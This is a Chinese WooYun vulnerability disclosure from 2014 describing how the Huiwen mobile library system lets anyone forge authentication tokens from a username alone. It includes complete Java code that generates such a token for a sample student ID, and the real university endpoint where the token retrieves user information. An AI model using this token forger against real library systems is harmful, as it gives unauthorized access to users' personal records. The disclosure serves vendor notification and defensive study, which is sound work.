当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-084928

漏洞标题:汇文手机图书馆不用密码获取用户信息

相关厂商:libsys.com.cn

漏洞作者: 路人甲

提交时间:2014-12-01 18:41

修复时间:2015-03-01 18:42

公开时间:2015-03-01 18:42

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-01: 细节已通知厂商并且等待厂商处理中
2014-12-02: 厂商已经确认,细节仅向厂商公开
2014-12-05: 细节向第三方安全合作伙伴开放
2015-01-26: 细节向核心白帽子及相关领域专家公开
2015-02-05: 细节向普通白帽子公开
2015-02-15: 细节向实习白帽子公开
2015-03-01: 细节向公众公开

简要描述:

生成认证token,只用用户名即可获取用户信息

详细说明:

将用于认证的token的生成方式在客户端实现且生成方式与密码无关
影响院校列表 http://www.libsys.com.cn/huiwen_app_center_2.php

漏洞证明:

import java.io.UnsupportedEncodingException;
import java.math.BigInteger;
/**
* Created by snail on 14-11-23.
*/
public class LibToken {
public static String makeToken(String s) {
int k, l, i1, j1, k1;
String s1, s2, s3, s4, s5;
StringBuffer stringBuffer;
byte abyte0[] = null;
try {
abyte0 = s.getBytes("utf-8");
} catch (UnsupportedEncodingException e) {
return null;
}
s1 = "";
for (l = 0; l < abyte0.length; l++) {
s2 = Integer.toHexString(0xff & abyte0[l]);
if (s2.length() == 1) {
s1 = (new StringBuilder(String.valueOf(s1))).append("0").append(s2).toString();
} else {
s1 = (new StringBuilder(String.valueOf(s1))).append(s2).toString();
}
// System.out.println(l+"-->s1-->"+s1+"s2-->"+s2);
}
//System.out.println("s1------>"+s1);
s4 = s1.toUpperCase();
stringBuffer = new StringBuffer("");
for (i1 = 0; i1 < s4.length(); i1++) {
stringBuffer.append(s4.charAt(i1));
if ((i1 % 2 == 0) && (i1 != 0) && (i1 < 12)) {
stringBuffer.append((int) (10D * Math.random()));
}
}
//System.out.println("stringBuffer.toString()--->"+stringBuffer.toString());
s5 = b(stringBuffer.toString());
//System.out.println("s5--->"+s5);
j1 = 0;
for (k = 0; k < s5.length(); k++) {
j1 += Integer.parseInt((new StringBuilder()).append(s5.charAt(k)).toString());
}
//System.out.println("j1---->"+j1);
k1 = j1 % 36;
if ((k1 <= 10) || (k1 == 16))
k1 = 18;
return (new StringBuilder(String.valueOf(a(s5, k1)))).append(a(k1)).toString();
}
public static String a(String s, int k) {
// System.out.println("s--->"+s+"---k-->-"+k);
BigInteger bigIntegerArray[] = new BigInteger[500];
for (int l = 0; l < 100; l++) {
bigIntegerArray[l] = new BigInteger("0");
}
BigInteger bi, bi1, bi2;
bi = new BigInteger(s);
bi1 = new BigInteger(String.valueOf(k));
bi2 = bi;
int i1;
for (i1 = 0; bi2.toString().length() != 1 || bi2.intValue() != 0; i1++) {
bigIntegerArray[i1] = bi2.mod(bi1);
bi2 = bi2.subtract(bigIntegerArray[i1]).divide(bi1);
}
for (int j1 = i1 - 1, k1 = 0; k1 < i1 / 2; k1++, j1--) {
BigInteger bi3 = bigIntegerArray[k1];
bigIntegerArray[k1] = bigIntegerArray[j1];
bigIntegerArray[j1] = bi3;
}
String s1 = "";
for (int l1 = 0; l1 < i1; l1++) {
s1 = (new StringBuilder((String.valueOf(s1)))).append(a(Long.parseLong(bigIntegerArray[l1].toString()))).toString();
}
// System.out.println("s1-->"+s1);
return s1;
}
public static String a(long l) {
if (l < 10L) {
//System.out.println("a00--->"+String.valueOf(l));
return String.valueOf(l);
}
if (l < 36L) {
//System.out.println("a11--->"+String.valueOf((char) (int) (65L + (l - 10L))));
return String.valueOf((char) (int) (65L + (l - 10L)));
} else
return "";
}
public static String b(String s) {
BigInteger bi1 = new BigInteger(String.valueOf(16));
BigInteger bi2 = new BigInteger("0");
BigInteger bi3 = bi2;
for (int k = 0; k < s.length(); k++) {
char c1 = s.charAt(k);
int m;
if ((c1 >= '0') && (c1 <= '9')) {
m = Integer.parseInt(String.valueOf(c1));
} else if ((c1 >= 'A') && (c1 <= 'Z')) {
m = 10 + (c1 - 'A');
} else {
m = -1;
}
bi3 = bi3.add(bi1.pow(-1 + (s.length() - k)).multiply(new BigInteger(String.valueOf(m))));
}
//System.out.println("bi3-->"+bi3.toString());
return bi3.toString();
}
public static void main(String[] args){
System.out.println("token--->"+LibToken.makeToken("1114011xx,扬州大学"));
}
}


将生成的token用到
http://opac.yzu.edu.cn:8081/m/mobile/rinfo.php?token=xxx

修复方案:

将token生成方式在服务器端生成 或者 token生成与密码有关

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2014-12-02 10:08

厂商回复:

谢谢,我们会尽快修复漏洞

最新状态:

暂无


漏洞评价:

评论

  1. 2015-03-26 17:10 | 动后河 ( 实习白帽子 | Rank:51 漏洞数:13 | ☭)

    System.out.println("token--->"+LibToken.makeToken("1114011xx,扬州大学"));